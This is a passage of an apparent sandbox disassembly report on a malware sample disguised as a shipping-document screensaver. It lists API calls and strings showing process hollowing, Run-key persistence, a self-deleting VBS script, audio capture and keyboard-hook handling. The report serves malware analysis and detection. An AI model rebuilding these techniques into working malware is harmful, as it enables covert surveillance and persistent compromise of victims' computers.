                                                      • API String ID: 1765752176-865373369
                                                      • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                      • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                      • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                      • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                      Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                      • ResumeThread.KERNEL32(?), ref: 00417582
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                      • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                      • GetLastError.KERNEL32 ref: 004175C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                      • API String ID: 4188446516-3035715614
                                                      • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                      • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                      • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                      • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                      Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                      • ExitProcess.KERNEL32 ref: 0041151D
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                      • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                      • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                      • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                        • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                        • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                        • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                      • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                        • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                      • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                      • API String ID: 4250697656-2665858469
                                                      • Opcode ID: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                      • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                      • Opcode Fuzzy Hash: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                      • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                      Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                        • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                      • ExitProcess.KERNEL32 ref: 0040C63E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                      • API String ID: 1861856835-3168347843
                                                      • Opcode ID: bc9ec409533e283fce2af8f1342da00a8cbb2ade10869ce45b4ee9a54c8ef04e
                                                      • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                      • Opcode Fuzzy Hash: bc9ec409533e283fce2af8f1342da00a8cbb2ade10869ce45b4ee9a54c8ef04e
                                                      • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                      Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                        • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                        • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                      • ExitProcess.KERNEL32 ref: 0040C287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                      • API String ID: 3797177996-1998216422
                                                      • Opcode ID: dffb05e8999f19a92d485080abe1753edacd729e18a2bd4646b419d6321fb820
                                                      • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                      • Opcode Fuzzy Hash: dffb05e8999f19a92d485080abe1753edacd729e18a2bd4646b419d6321fb820
                                                      • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                      Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                      • SetEvent.KERNEL32 ref: 0041A38A
                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                      • CloseHandle.KERNEL32 ref: 0041A3AB
                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                      • API String ID: 738084811-1408154895
                                                      • Opcode ID: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                      • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                      • Opcode Fuzzy Hash: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                      • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                      Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                      • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                      • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                      • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Write$Create
                                                      • String ID: RIFF$WAVE$data$fmt
                                                      • API String ID: 1602526932-4212202414
                                                      • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                      • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                      • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                      • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                      Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000001,004068B2,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                      • API String ID: 1646373207-2324880036
                                                      • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                      • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                      • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                      • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                      Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                      • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                      • lstrlenW.KERNEL32(?), ref: 0041B207
                                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                      • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                      • _wcslen.LIBCMT ref: 0041B2DB
                                                      • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                      • GetLastError.KERNEL32 ref: 0041B313
                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                      • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                      • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                      • GetLastError.KERNEL32 ref: 0041B370
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                      • String ID: ?
                                                      • API String ID: 3941738427-1684325040
                                                      • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                      • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                      • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                      • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                      Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable$_wcschr
                                                      • String ID:
                                                      • API String ID: 3899193279-0
                                                      • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                      • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                      • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                      • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                      Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                      • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                      • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                      • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                      • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                      • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                      • Sleep.KERNEL32(00000064), ref: 00412060
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                      • String ID: /stext "$HDG$HDG$>G$>G
                                                      • API String ID: 1223786279-3931108886
                                                      • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                      • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                      • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                      • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                      Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                      • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                      • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                      • API String ID: 2490988753-744132762
                                                      • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                      • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                      • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                      • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                      Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
